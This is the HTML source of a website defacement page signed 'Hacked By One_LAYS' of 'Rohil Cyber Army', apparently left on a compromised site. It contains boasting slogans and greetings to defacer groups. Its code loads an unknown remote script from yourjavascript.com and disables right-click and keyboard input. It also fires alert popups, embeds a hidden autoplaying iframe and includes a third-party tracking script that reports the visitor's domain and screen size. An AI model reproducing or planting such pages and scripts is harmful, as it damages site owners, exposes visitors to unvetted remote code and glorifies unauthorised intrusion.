<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>&#1555;&#1202;&#824;&#1202;&#824;&#1202; Hacked By One_LAYS &#1202;&#824;&#1202;&#824;&#1202;&#1555;</title>
<link rel="SHORTCUT ICON" href="https://bondegaaardsferie.dk/content/rca_blue2.png" type="image/png"/>
<meta name="title" content="Hacked by One_LAYS"/>
<meta name="keywords" content="HACKER, Hacked By One_LAYS, Hacker Indonesia, Indonesian Hacker, One_LAYS, Hacker Rohil, Hacker Riau, Defaced By One_LAYS, Hacker Pekanbaru, Hacker 2018, Defacer Terbaru, Rohil Cyber Army, RCA TEAM, PANTESTER, PANTESTED, Hacker Dunia, Hack Website, Hack System, System Hacked, System Hacked By One_LAYS"/>
<meta name="description" content="FUCK THE SYSTEM">
<meta name="rating" content="General"/>
<meta name="language" content="English"/>
<meta content="One_LAYS, Rohil Cyber Army" name="Author"/>
<meta name="revisit-after" content="1 days"/>
<meta name="classification" content="Hacked by One_LAYS"/>
<meta name="robots schedule" content="auto"/>
</head>
<style>
body	{
	background-image: url("https://scontent-sjc3-1.xx.fbcdn.net/v/t1.0-0/cp0/e15/q65/s320x320/25442739_1589898954437677_290380870965068262_n.jpg?_nc_cat=0&efg=eyJpIjoiYiJ9&oh=7f33324fb7e8373c8dbcefdfa4ab4c2d&oe=5B922E69");
	background-repeat: no-repeat;
	background-repeat: no-repeat;
    	background-attachment: fixed;
    	background-position: center; 
	background-size: 100% 100%;
	color: white;
	text-align: center;
	font-family: 'Dosis', sans-serif;
	letter-spacing: 2px;
	line-height: 25px;
         -webkit-background-size: 100% 100%;
	text-shadow:0px 0px 5px #ff0000;
	font-size:20px;
}
a 	{
	text-decoration: none;
	color: white;
}
a:hover	{
	text-decoration: none;
	color: maroon;
}
asu {
	font-size: 16pt; 
	font-family: 'Sedgwick Ave', cursive;
}
h1	{
	font-size: 30pt;
}
img {
opacity: 0.8;
}
img {
animation-name: rotate ;
animation-duration: 5s;
animation-play-state: running;
animation-timing-function: linear;
animation-iteration-count: infinite;
opacity: 1.0;
filter: alpha(opacity=50);} 
img:hover {opacity: 1.0;filter: alpha(opacity=100);}
@keyframes rotate{
10% {transform:rotateY(36deg)}
20% {transform:rotateY(72deg)}
30% {transform:rotateY(108deg)}
40% {transform:rotateY(144deg)}
50% {transform:rotateY(180deg)}
60% {transform:rotateY(216deg)}
70% {transform:rotateY(252deg)}
80% {transform:rotateY(288deg)}
90% {transform:rotateY(324deg)}
100% {transform:rotateY(360deg)}
}
</style>
<script type="text/­javascript" src="http://­yourjavascript.com/­56133167111/fb.js"></script>
</head>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' >
<div style="position: fixed; top: 75px; left: -225px; width: 600px; padding: 10px; font-size: 24px; text-align: center; color: white; font-family: 'trebuchet ms', verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: Transparent; border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><a href="https://i.gifer.com/D6Ow.gif" style="text-decoration:none;color:white;">Hacked by One_LAYS</a></div>
<link href="https://fonts.googleapis.com/css?family=Dosis|Sedgwick+Ave" rel="stylesheet">
<img href='https://mobile.facebook.com/profile.php?id=1769140016662279&ref=content_filter/' src='http://anandabazarpatrika.myadvtcorner.com/images/home/banner4.png
' style="opacity:10;filter:alpha(opacity=10)" onmouseover="this.style.opacity=1;this.filters.alpha.opacity=100" onmouseout="this.style.opacity=0.4;this.filters.alpha.opacity=40" height="250" style='width:210px; height:210px; '><br><br>
<asu>[ ROHIL CYBER ARMY ]</asu><br><br>
<font color='green'><b>Hacked By One_LAYS</b></font>
<br><br><font color="red">Indonesian</font> <font color="white">Defacer</font><br><br>
 <font color='yellow'>Security Just An Illusion</font>  <font color='red'></font>  <font color='red'></font>  <font color='red'></font><br><br>
 <font color='red' size='5' ><b>NO SYSTEM IS SAFE !</b></font>
<br><br>
~ <font color='red'>\</font><font  color='grey'> Greetz</font> <font color='red'>/</font> ~<br>
| Rohil Cyber Army | Indonesian Defacer | Show Off Defacer Indonesia | Family Attack Cyber | Pacman Corp | Typical Idiot Security | GopressXploits  | Error Violence | IndoXploit | B374k | PenggilaSabun |<br> And Thanks To  All Team Defacer Indonesia | 
<br>
Contact <font color='red'>:</font color='red'> on3_l4ys@yahoo.com<br>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31vFRw%2bkvf338gsMiFcBKU8TdASdY23XyEdvY55bPJ7m37%2fAexulpBZP4egcFZjn2pe2DUN7bSz%2bhgO5jYJRi6zuNcxwl328uGQuPK21uU4Z6ATxc%2fqSRIm7ketQof08paafkYTjUHsq4rJ9V8boziQjrMfIjsrWjxlkdBK92FBbU8MImcxTxHE%2fW0MwRGUDQq5LBqxTIV6ZjKyIG9OeHEMlic7RjQQK8zIxMk8GEsVSi81p%2bhb1r5Zq8%2fbOKdj7L%2bA%2bn97cDANtvJkQG8iQkCoW6OcQQkQSVoYKCwRQIaFcJmYgDCaJac0XW9Eih0FlfGU4rrdIwxf%2buhclUsV2fP1DLmBDu95fXQpAd8PHqHE1itn51YHbqb0AvfRMf8a4%2b%2b3GpjT4oynyOVg5P%2bC9aec%2fO1RsKVwgjJYN%2fL%2b2GIv7w9qEndnWzwyVeujZEgT3EOICxBarKuEuhzOoeYcm1ycLUTWiukz7KvlsWbIPX8zulT86CzXB1i2%2bGQANiGea793GuFDL%2fLE5wPxG76q0OAzPRHOt6lBPBNNl%2bzy08KUSyawnAv86SaQg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
<script>alert('Hacked By One_LAYS')</script>
<script>alert('One_LAYS was Here!')</script>
</body>
<iframe width="1" height="1" src="https://www.koutube.com/embed/Gc74aRe7OLM?rel=0&autoplay=1&loop=1&playlist=Gc74aRe7OLM" frameborder="0" allowfullscreen></iframe><br><center><font 
</html>